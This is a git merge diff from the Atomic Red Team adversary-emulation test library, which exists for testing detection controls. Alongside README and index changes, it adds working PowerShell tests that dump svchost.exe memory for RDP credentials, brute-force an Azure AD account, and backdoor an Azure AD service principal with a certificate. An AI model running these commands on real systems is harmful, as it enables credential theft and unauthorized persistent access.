Merge branch 'master' into platform-change-T1611

2021-07-26 15:14:33 -07:00
parent c5b5f9ec70 4ab80721ac
commit 8a87508ccd
26 changed files with 844 additions and 75 deletions
@@ -12,7 +12,7 @@ GEM
      minitest (~> 5.1)
      tzinfo (~> 1.1)
      zeitwerk (~> 2.2, >= 2.2.2)
-    addressable (2.7.0)
+    addressable (2.8.0)
      public_suffix (>= 2.0.2, < 5.0)
    coffee-script (2.4.1)
      coffee-script-source
@@ -1,59 +1,39 @@
 <p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>

 # Atomic Red Team
+
 [![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)

-Atomic Red Team allows every security team to test their controls by executing simple
-"atomic tests" that exercise the same techniques used by adversaries (all mapped to
-[Mitre's ATT&CK](https://attack.mitre.org)).
+Atomic Red Team is library of tests mapped to the
+[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
+Atomic Red Team to quickly, portably, and reproducibly test their environments.

-## Philosophy
+## Get started

-Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
-focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
+You can execute atomic tests directly from the command line, no installation
+required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
+page of our wiki.

-Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
-  Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
-  what our controls and program can detect, and what it cannot. We don’t have to detect every adversary, but we
-  do believe in knowing our blind spots.
+For a more robust testing experience, consider using an execution framework like
+[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).

- **We should be able to run a test in less than five minutes.**
-  Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
-  We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
-  run in a few minutes.
+## Learn more

-  The best test is the one you actually run.
+The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).

- **We need to keep learning how adversaries are operating.**
-  Most security teams don’t have the benefit of seeing a wide variety of adversary types and techniques crossing
-  their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
-  which makes the community working together essential to making us all better.
+For information about the philosophy and development of Atomic Red Team, visit
+our website at <https://atomicredteam.io>.

-See: https://atomicredteam.io
+## Contribute to Atomic Red Team

-## Having trouble?
+Atomic Red Team is open source and community developed. If you're interested in
+becoming a contributor, check out these resources:

-Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link))
-
-## Getting Started
-
-* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
-* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework)
-* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
-  - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
-  - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
-  - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
-* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
-* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
-* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
-    * Need a Slack invitation? Submit an invite request via this [Google Form](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)
-
-## Code of Conduct
-
-In order to have a more open and welcoming community, Atomic Red Team adheres to a
-[code of conduct](CODE_OF_CONDUCT.md).
-
-## License
-
-See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
+- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
+  with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
+  before you join.
+- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
+- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+  for more information about contributing directly to this repository.
+- Check the [license](LICENSE.txt) for information regarding the distribution
+  and modification of Atomic Red Team.
@@ -55,10 +55,12 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
 credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
@@ -494,7 +496,9 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
-persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -9,6 +9,7 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -153,7 +154,9 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
-persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
@@ -39,6 +39,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
 credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
@@ -91,6 +91,7 @@
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
+  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
 - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
  - Atomic Test #1: Password Cracking with Hashcat [windows]
 - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
@@ -98,6 +99,7 @@
 - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
  - Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows]
  - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
  - Atomic Test #1: Password Spray all Domain Users [windows]
@@ -853,7 +855,9 @@
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
-  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
+  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
+  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
+  - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
  - Atomic Test #1: Install AppInit Shim [windows]
@@ -30,7 +30,8 @@
  - Atomic Test #1: Packet Capture Linux [linux]
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
+  - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
  - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
@@ -412,7 +413,9 @@
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
-  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
+  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
+  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
+  - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
 - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
  - Atomic Test #1: At - Schedule a job [linux]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -69,6 +69,7 @@
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
+  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
 - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
  - Atomic Test #1: Password Cracking with Hashcat [windows]
 - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
@@ -21,7 +21,7 @@
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) |  | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Keylogging](../../T1056.001/T1056.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-|  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -2522,11 +2522,15 @@ credential-access:
        'aureport --tty' or other audit.d reading tools to read the log output, which
        is binary.  Mac OS does not currently contain the pam_tty_audit.so library.
        \n"
-      prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+      dependencies:
+      - description: 'Checking if pam_tty_audit.so is installed

 '
-      get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and
-        recompile, for this test to work"
+        prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+
+'
+        get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
+          and recompile, for this test to work"

 '
      supported_platforms:
@@ -4062,6 +4066,25 @@ credential-access:
          C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore"
        name: powershell
        elevation_required: true
+    - name: Dump svchost.exe to gather RDP credentials
+      auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
+      description: |
+        The svchost.exe contains the RDP plain-text credentials.
+        Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+        Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+          if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+          C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+        cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: true
  T1110.002:
    technique:
      external_references:
@@ -4425,6 +4448,55 @@ credential-access:
            }
          }
          Write-Host "End of bruteforce"
+    - name: Brute Force Credentials of single Azure AD user
+      auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
+      description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
+
+'
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Account to bruteforce. We encourage users running this atomic
+            to add a valid microsoft account domain; for eg "bruce.wayne@<valid_ms_account.com>"
+          type: String
+          default: bruce.wayne@contoso.com
+        passwords:
+          description: List of passwords we will attempt to brute force with
+          type: String
+          default: Password1`n1q2w3e4r`nPassword!
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          Import-Module -Name AzureAD
+
+          $passwords = "#{passwords}".split("{`n}")
+          foreach($password in $passwords) {
+            $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+            $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+            try {
+              Write-Host " [-] Attempting ${password} on account #{username}."
+              Connect-AzureAD -Credential $Credential 2>&1> $null
+              # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+              Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+              break
+            } catch {
+              Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+            }
+          }
+          Write-Host "End of bruteforce"
  T1555.005:
    technique:
      external_references:
@@ -7908,11 +7980,15 @@ collection:
        'aureport --tty' or other audit.d reading tools to read the log output, which
        is binary.  Mac OS does not currently contain the pam_tty_audit.so library.
        \n"
-      prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+      dependencies:
+      - description: 'Checking if pam_tty_audit.so is installed

 '
-      get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and
-        recompile, for this test to work"
+        prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
+
+'
+        get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
+          and recompile, for this test to work"

 '
      supported_platforms:
@@ -13512,7 +13588,7 @@ privilege-escalation:
        command: |
          sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
          sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
-        cleanup: |
+        cleanup_command: |
          sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
          sudo rm /Library/LaunchDaemons/#{plist_filename}
  T1053.004:
@@ -37108,6 +37184,159 @@ persistence:
      - Azure AD
      identifier: T1098.001
    atomic_tests:
+    - name: Azure AD Application Hijacking - Service Principal
+      auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406
+      description: |
+        Add a certificate to an Application through its Service Principal.
+        The certificate can then be used to authenticate as the application and benefit from its rights.
+        An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        service_principal_name:
+          description: Name of the targeted service principal
+          type: String
+          default: SuperSP
+        certificate_password:
+          description: Password of the new certificate
+          type: string
+          default: Passw0rd
+        path_to_cert:
+          description: Path of the new certificate, locally stored
+          type: string
+          default: "$env:TEMP"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+          if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+          # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
+          $certNotAfter = (Get-Date).AddDays(2)
+          $credNotAfter = (Get-Date).AddDays(1)
+          $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+          $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+          Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd
+
+          $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+          $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+          New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+          Start-Sleep -s 30
+          $tenant=Get-AzureADTenantDetail
+          $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+          Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+          Write-Host "End of Hijacking"
+        cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString
+          -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+          System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+          $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal
+          -Searchstring \"#{service_principal_name}\"\n$credz = Get-AzureADServicePrincipalKeyCredential
+          -ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n  if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
+          -eq \"AtomicTest\") {\n    Remove-AzureADServicePrincipalKeyCredential -ObjectId
+          $sp.ObjectId -KeyId $cred.KeyId\n  }  \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
+          | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"\n"
+        name: powershell
+        elevation_required: false
+    - name: Azure AD Application Hijacking - App Registration
